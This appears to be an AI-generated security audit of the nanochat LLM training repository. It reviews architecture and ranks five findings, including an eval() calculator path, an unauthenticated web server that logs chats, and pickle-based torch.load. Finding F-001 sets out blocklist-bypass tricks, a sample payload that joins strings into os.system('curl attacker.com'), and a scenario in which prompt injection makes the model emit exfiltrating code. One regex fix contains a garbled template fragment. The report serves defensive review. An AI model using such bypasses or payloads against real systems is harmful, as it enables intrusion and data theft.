CodeAudit · Architectural & Security Review

karpathy/nanochat

Nanochat is a well-crafted research and educational LLM training harness from Andrej Karpathy with a clear, readable codebase and strong engineering habits throughout. For its inte

Repositoryhttps://github.com/karpathy/nanochat
Generated2026-05-08T06:33:12.649Z
Files analysed43
Run IDrun_ebf2b8280277
Generated by AI (Claude) — reviewed by automated pipeline. This report was produced by an automated audit pipeline. Findings are grounded in the source you provided: every citation references a real file and line range. See the appendix for methodology and explicit scope limitations.

01Executive summary

B

Nanochat is a well-crafted research and educational LLM training harness from Andrej Karpathy with a clear, readable codebase and strong engineering habits throughout. For its intended purpose — a hackable, single-node training framework — it earns high marks. However, the web-serving layer (chat_web.py) ships with a configuration appropriate for a demo, not a public-facing service: it binds to 0.0.0.0, serves full conversation logs to anyone who can read stdout, and contains an eval() call inside the inference hot-path that is only partially sandboxed. The codebase has zero automated tests for the training pipeline, no secrets management beyond a .gitignore entry, and the code-execution sandbox used for HumanEval explicitly acknowledges it is not a true security boundary. None of these are blockers for research use or private deployment, but they become real risks the moment this server is exposed to the public internet or ingested by a commercial operation.

Top risks

  1. The web server binds to 0.0.0.0 by default and logs every user message and model response in plaintext to stdout, meaning anyone with shell access to the host can read all conversations — a GDPR and privacy liability if deployed to real users.
  2. An eval() call in the inference engine processes expressions extracted from model-generated text; while there is a blocklist, it is not a true sandbox and a sufficiently crafted prompt could execute arbitrary code on the inference server.
  3. There are no automated tests for training, data loading, checkpointing, or the optimizer — meaning a silent regression in a critical path (e.g., loss masking, gradient accumulation, or checkpoint loading) could corrupt a multi-day, multi-thousand-dollar training run without any alert.

Top actions

  1. Ask your engineers: 'Before we expose chat_web.py to any external users, what is our plan for conversation data retention, PII handling, and authentication — and have we confirmed the server cannot be reached without a reverse proxy that enforces TLS and rate limiting?'
  2. Ask your engineers: 'Can you show me a threat model for the use_calculator() eval() call in engine.py — specifically, what happens if the model is prompted to generate a python block that exfiltrates environment variables or makes a network request?'
  3. Decide whether this codebase needs a formal test suite before any commercial or regulated use: the current single test file covers only the Engine inference loop, leaving the training pipeline, checkpointing, and data loading entirely untested.

Is this codebase safe to…?

Safe to deploy?
with-conditions
safe for private/research deployment behind a firewall; not safe for public internet exposure without authentication, TLS termination, and a conversation data policy
Safe to acquire?
with-conditions
the ML engineering quality is high and the research value is clear, but a buyer should budget for a security hardening sprint before any customer-facing deployment
Safe to ship to customers?
no
the web server has no authentication, logs all conversations in plaintext, and the inference engine contains an eval() path; these must be resolved before customer use
Safe to inherit?
yes
the codebase is well-commented, consistently structured, and the dev/LOG.md provides an unusually thorough record of design decisions; maintainability risk is low

02Repository profile

Primary languagesPython, Shell, Markdown
Frameworks detectedFastAPI, PyTorch, tiktoken, HuggingFace datasets, wandb
Entry pointsscripts/base_train.py, scripts/chat_sft.py, scripts/chat_rl.py, scripts/chat_web.py, scripts/chat_cli.py
Lines of code (post-filter)14429
Source files (post-filter)52
Test-to-code ratioroughly 1:30 — one test file (tests/test_engine.py, 267 LOC) covering only inference; no tests for training, data loading, optimizer, or checkpointing

03Architecture & structure

Module map

The codebase is cleanly divided into four layers: (1) core model code in nanochat/ — GPT transformer (gpt.py), optimizer (optim.py), tokenizer (tokenizer.py), KV-cache inference engine (engine.py), and data loading (dataloader.py, dataset.py); (2) training scripts in scripts/ — separate entry points for pretraining (base_train.py), supervised fine-tuning (chat_sft.py), reinforcement learning (chat_rl.py), and a FastAPI web server (chat_web.py); (3) evaluation tasks in tasks/ — each benchmark (GSM8K, MMLU, ARC, HumanEval, SpellingBee) is a self-contained Task subclass; (4) developer tooling in dev/ and runs/ — shell scripts for orchestration, an experiment log, and a synthetic data generator.

Layering verdict

Layering is commendably clean for a research codebase of this size. The model knows nothing about tokenization; the engine knows nothing about training; the tasks know nothing about the model internals. The one notable leak is that chat_web.py directly assembles conversation token sequences by calling tokenizer methods inline rather than delegating to a shared conversation-rendering utility — the same logic exists in chat_cli.py and generate_stream() — creating a maintenance footgun if the chat format ever changes.

Coupling notes

Coupling is generally loose. The tightest coupling is between GPT.forward() and KVCache in engine.py: the cache is advanced inside the attention layer (gpt.py line 106-108), which means the model and inference engine share positional state in a way that is not immediately obvious from the Engine API. The checkpoint_manager.py dependency on GPTConfig is expected and appropriate. The common.py COMPUTE_DTYPE global is read by optim.py, fp8.py, flash_attention.py, and gpt.py — this is a deliberate design choice documented in the LOG and is acceptable, though it means changing precision requires touching multiple files.

04What's working well

  • The distributed optimizer (DistMuonAdamW in optim.py) implements a genuine three-phase async communication pattern with reduce_scatter/all_gather overlap and ZeRO-2-style optimizer state sharding — this is production-quality distributed training code, not a toy wrapper around DDP.
  • The checkpoint_manager.py includes explicit forward-compatibility patching (_patch_missing_config_keys, _patch_missing_keys) that adds default values for new model parameters missing from old checkpoints — a mature engineering practice that prevents silent failures when loading older runs.
  • The chat_web.py validate_chat_request() function enforces hard numeric limits on message count (500), per-message length (8000 chars), total conversation length (32000 chars), and clamps all generation hyperparameters — this is thoughtful abuse-prevention that most demo servers omit entirely.
  • The execution.py sandbox for HumanEval code runs untrusted code in a forked subprocess with RLIMIT_AS memory limits, disabled dangerous builtins (os.kill, subprocess.Popen, shutil.rmtree), stdin blocking, and a hard process-kill timeout — substantially more careful than naive eval() usage.
  • The dev/LOG.md is an unusually detailed 1000+ line experiment journal documenting every architectural decision, negative result, and hyperparameter sweep with quantitative outcomes — this dramatically reduces the onboarding cost for any engineer inheriting the codebase.

05Findings (ranked)

5 findings, ordered by severity.

F-001 high confidence: high

eval() in inference hot-path with insufficient allowlist

A carefully crafted user message could cause the chat model to execute arbitrary Python code on the inference server.

Why it matters to you

The use_calculator() function is called on every python-block token sequence the model generates. The blocklist approach (checking for dangerous_patterns like 'import', 'exec', 'eval') is bypassable: getattr(__builtins__, 'eval') or string concatenation tricks are well-known bypasses. If this server is exposed to the public internet, an adversarial user who can influence model outputs could exfiltrate environment variables, read files, or make outbound network calls. Even for internal use, a prompt-injection attack via training data could trigger this path.

Technical evidence
nanochat/engine.py:46-76
def use_calculator(expr):
    """
    Evaluate a Python expression safely.
    Supports both math expressions and string operations like .count()
    """
    # Remove commas from numbers
    expr = expr.replace(",", "")

    # Check if it's a pure math expression (old behavior)
    if all([x in "0123456789*+-/.() " for x in expr]):
        if "**" in expr:  # disallow power operator
            return None
        return eval_with_timeout(expr)

    # Check if it's a string operation we support
    # Allow: strings (single/double quotes), .count(), letters, numbers, spaces, parens
    allowed_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'\"()._ "
    if not all([x in allowed_chars for x in expr]):
        return None

    # Disallow dangerous patterns
    dangerous_patterns = ['__', 'import', 'exec', 'eval', 'compile', 'open', 'file',
                         'input', 'raw_input', 'globals', 'locals', 'vars', 'dir',
                         'getattr', 'setattr', 'delattr', 'hasattr']
    expr_lower = expr.lower()
    if any(pattern in expr_lower for pattern in dangerous_patterns):
        return None

    # Only allow .count() method for now (can expand la
… [truncated]

The function calls eval_with_timeout() which ultimately calls Python's built-in eval() with only {'__builtins__': {}} as the globals. However, the allowed_chars allowlist permits single and double quotes, parentheses, and letters — enough to construct strings that access builtins via object.__subclasses__() or similar class-hierarchy traversal attacks. The dangerous_patterns blocklist uses substring matching on the lowercased expression, which can be bypassed by splitting dangerous tokens across string concatenation. The .count() check is easily satisfied by appending .count('x') to an otherwise dangerous expression. This is a pattern that security researchers have repeatedly demonstrated is insufficient for sandboxing Python eval().

Recommended fix

Replace eval() entirely. For math expressions, use a dedicated safe math parser such as the `simpleeval` library (supports +,-,*,/,() with no exec surface) or implement a recursive descent parser for the four arithmetic operations. For string .count() specifically, parse the expression with a regex: r"^'([^']+)'\.count\('([^']+)'\){{BODY}}quot; and call Python's str.count() directly without eval(). This eliminates the eval() surface entirely. If eval() must be kept for research convenience, wrap it in the execute_code() subprocess sandbox already present in nanochat/execution.py, which provides OS-level isolation.

What to ask your engineers
  • Can you demonstrate what happens if a user sends a message that causes the model to output a python block containing `''.join(['os','.system','("curl attacker.com")'])`.count('x')`?
  • Why is use_calculator() using eval() rather than the execute_code() subprocess sandbox that already exists in nanochat/execution.py for exactly this purpose?
F-002 high confidence: high

Web server binds to 0.0.0.0 with no authentication and plaintext conversation logging

Anyone who can reach the server's IP address can use the chat API and read all conversations in the server logs — there is no login, no rate limiting per user, and no encryption by default.

Why it matters to you

The default host is '0.0.0.0' (all network interfaces) and port 8000. There is no authentication middleware, no API key requirement, and no per-user rate limiting beyond the input size caps. Every message and response is logged to stdout via Python's logging module in plaintext. If deployed on a cloud instance, this means the chat service is publicly accessible from the internet and all conversations are stored unencrypted in server logs. For any deployment serving real users, this creates GDPR Article 32 exposure (failure to implement appropriate technical measures for personal data) and enables trivial abuse including prompt injection attacks, resource exhaustion, and data harvesting.

Technical evidence
scripts/chat_web.py:372-381
    logger.info("="*20)
    for i, message in enumerate(request.messages):
        logger.info(f"[{message.role.upper()}]: {message.content}")
    logger.info("-"*20)

    # Acquire a worker from the pool (will wait if all are busy)
    worker_pool = app.state.worker_pool
    worker = await worker_pool.acquire_worker()

Every inbound message and every outbound model response (lines 372-374 and the finally block in stream_and_release) is written to the Python logger at INFO level, which by default writes to stdout with timestamps. Combined with the 0.0.0.0 bind address (line at the bottom of the file: uvicorn.run(app, host=args.host, port=args.port) where args.host defaults to '0.0.0.0') and the CORS middleware allowing all origins (allow_origins=['*']), this creates a fully open, fully logged public API with no user identity separation.

Recommended fix

For any non-localhost deployment: (1) place a reverse proxy (nginx or Caddy) in front of the FastAPI app that terminates TLS and enforces authentication (e.g., HTTP Basic Auth or Bearer tokens via an X-API-Key header); (2) change the default host to '127.0.0.1' so the server only accepts connections from the local machine or the reverse proxy; (3) replace plaintext conversation logging with structured logging that redacts or hashes user content, storing only metadata (timestamp, session ID, message length, GPU ID); (4) add a per-IP rate limit using slowapi or a similar FastAPI middleware. If GDPR compliance is required, add a data retention policy and ensure logs are not written to persistent storage.

What to ask your engineers
  • What is the current deployment topology for chat_web.py — is there a reverse proxy with TLS in front of it, and is access restricted to known IP ranges, or is port 8000 open to the public internet?
  • Where are the server logs stored, who has access to them, and what is the retention period — given that they contain the full text of every user conversation?
F-003 medium confidence: high

torch.load() called without weights_only=True on untrusted checkpoint files

Loading a maliciously crafted model checkpoint file could execute arbitrary code on the machine running the training or inference scripts.

Why it matters to you

PyTorch's torch.load() with default settings uses Python's pickle module, which can execute arbitrary code during deserialization. If a checkpoint file is obtained from an untrusted source (e.g., downloaded from HuggingFace, received from a collaborator, or placed in a shared directory by a malicious insider), loading it with the current code would give an attacker full code execution. This is a well-known, documented PyTorch vulnerability and PyTorch itself now warns about it and recommends weights_only=True for all untrusted inputs.

Technical evidence
nanochat/checkpoint_manager.py:74-82
def load_checkpoint(checkpoint_dir, step, device, load_optimizer=False, rank=0):
    # Load the model state
    model_path = os.path.join(checkpoint_dir, f"model_{step:06d}.pt")
    model_data = torch.load(model_path, map_location=device)
    # Load the optimizer state if requested
    optimizer_data = None
    if load_optimizer:
        optimizer_path = os.path.join(checkpoint_dir, f"optim_{step:06d}_rank{rank:d}.pt")
        optimizer_data = torch.load(optimizer_path, map_location=device)

torch.load() without weights_only=True uses Python's pickle protocol to deserialize the file. Pickle allows arbitrary Python objects to be serialized, including objects whose __reduce__ method executes shell commands on deserialization. A file named model_000000.pt placed in the expected checkpoint directory — whether via a supply-chain compromise, a shared filesystem attack, or a malicious download — would execute its payload the moment load_checkpoint() is called. The same pattern appears in load_optimizer_state() at line ~180. PyTorch 2.0+ emits a FutureWarning about this and will change the default in a future version.

Recommended fix

Add weights_only=True to all torch.load() calls for model and optimizer state: torch.load(model_path, map_location=device, weights_only=True). This restricts deserialization to tensors, dictionaries, lists, and primitive types, blocking arbitrary code execution. Note that optimizer state dictionaries may contain Python objects beyond tensors (e.g., step counters as Python ints); test the optimizer load path after adding this flag and add any required safe_globals if PyTorch raises an error. For the token_bytes.pt file loaded in tokenizer.py, apply the same fix.

What to ask your engineers
  • Do any of our workflows download checkpoint files from external sources (HuggingFace, S3, collaborator machines) and load them directly with torch.load() — and if so, have we verified the integrity of those files before loading?
  • Can you add weights_only=True to all torch.load() calls this week and confirm the optimizer and model loading tests still pass?
F-004 medium confidence: high

Python GC deliberately disabled during training with no re-enable path on error

A training crash after the garbage collector is disabled could leave the Python process in a state where memory from failed allocations accumulates silently until the process is killed.

Why it matters to you

The training loop explicitly calls gc.disable() after the first step, which is a documented performance optimization. However, the disable happens unconditionally with no try/finally guard, meaning any exception that exits the training loop (OOM, keyboard interrupt, NCCL timeout) will leave garbage collection permanently disabled for the lifetime of the process. On long multi-day training runs on shared infrastructure, this can cause slow memory creep that is difficult to diagnose and can interfere with the checkpoint save code that runs after training. This is a reliability risk, not a security risk, but on a $48-$100 training run, a silent OOM caused by accumulated cyclic garbage could waste significant compute.

Technical evidence
scripts/base_train.py:552-560
    first_step_of_run = (step == 0) or (resuming and step == args.resume_from_step)
    step += 1

    # The garbage collector is sadly a little bit overactive and for some poorly understood reason,
    # it spends ~500ms scanning for cycles quite frequently, just to end up cleaning up very few tiny objects each time.
    # So we manually manage and help it out here
    if first_step_of_run:
        gc.collect() # manually collect a lot of garbage from setup
        gc.freeze() # immediately freeze all currently surviving objects and exclude them from GC
        gc.disable() # nuclear intervention here: disable GC entirely except:

gc.disable() is called inside the training loop body on the first step, with no corresponding re-enable in an exception handler or finally block. The outer while True loop has no try/except wrapper. If an exception propagates out of the training body (e.g., torch.cuda.OutOfMemoryError, dist.DistStoreError, or a user KeyboardInterrupt), Python's reference counting will still free objects without cycles, but any objects involved in reference cycles (common in PyTorch's autograd graph) will not be freed until the process exits. The same pattern exists identically in chat_sft.py.

Recommended fix

Wrap the gc.disable() call so it can be re-enabled on exit. The simplest fix is to wrap the training loop in a try/finally block: try: [training loop] finally: gc.enable(). Alternatively, use a context manager. Also consider whether gc.freeze() combined with gc.collect() every 5000 steps is sufficient without the full gc.disable() — this would be safer and still avoids the ~500ms pause problem described in the comment.

What to ask your engineers
  • What happens to memory usage if a training run throws an OOM error after step 1 — does the process exit cleanly, or does it accumulate garbage before the checkpoint save code runs?
  • Is the ~500ms GC pause actually confirmed by profiling, or is this based on an older observation — and could we replace gc.disable() with gc.set_threshold(0, 0, 0) to keep GC enabled but effectively disabled for the same performance benefit with a safer re-enable path?
F-005 medium confidence: medium

OpenRouter API key loaded from environment with no validation or rotation guidance

The synthetic data generation script reads an API key from the environment and would silently fail or leak it if the .env file is accidentally committed.

Why it matters to you

The dev/gen_synthetic_data.py script loads OPENROUTER_API_KEY directly from the environment via python-dotenv. The .gitignore correctly excludes .env, but the script contains no validation that the key is present before making API requests, no masking of the key in error messages, and no guidance on key rotation. More importantly, the script sends full conversation histories to OpenRouter (a third-party API aggregator), meaning all synthetic training data generation involves sending potentially sensitive knowledge base content to an external service. For a commercial acquirer, this creates a data flow that may require legal review.

Technical evidence
dev/gen_synthetic_data.py:38-44
load_dotenv()
api_key = os.environ["OPENROUTER_API_KEY"]

url = "https://openrouter.ai/api/v1/chat/completions"
headers = {
    "Authorization": f"Bearer {api_key}",
    "Content-Type": "application/json"
}

os.environ["OPENROUTER_API_KEY"] raises a KeyError if the variable is missing, which will produce a stack trace that includes the variable name but not the value — this is acceptable. However, there is no check that api_key is non-empty before using it, meaning an empty string would be sent as an Authorization header and could produce confusing errors. More substantively, the script sends the full contents of knowledge/self_knowledge.md (loaded at line ~32) to OpenRouter in every single API request as part of the system prompt — if this file contains proprietary model architecture details or training data insights, that content is transmitted to a third-party service with every synthetic data generation run.

Recommended fix

Add a guard: assert api_key, 'OPENROUTER_API_KEY is empty'. Document in the script header which external services receive data and what that data contains. For a production workflow, consider using a secrets manager (AWS Secrets Manager, HashiCorp Vault) rather than a .env file, and add a pre-commit hook that scans for common API key patterns. For the knowledge base transmission, review whether the self_knowledge.md content is appropriate to send to a third-party API under your data agreements.

What to ask your engineers
  • Is the OPENROUTER_API_KEY currently committed anywhere in the repository history — has anyone run git log -S 'sk-or-' to check?
  • What data does knowledge/self_knowledge.md contain, and have we confirmed that sending it to OpenRouter is consistent with our data handling agreements?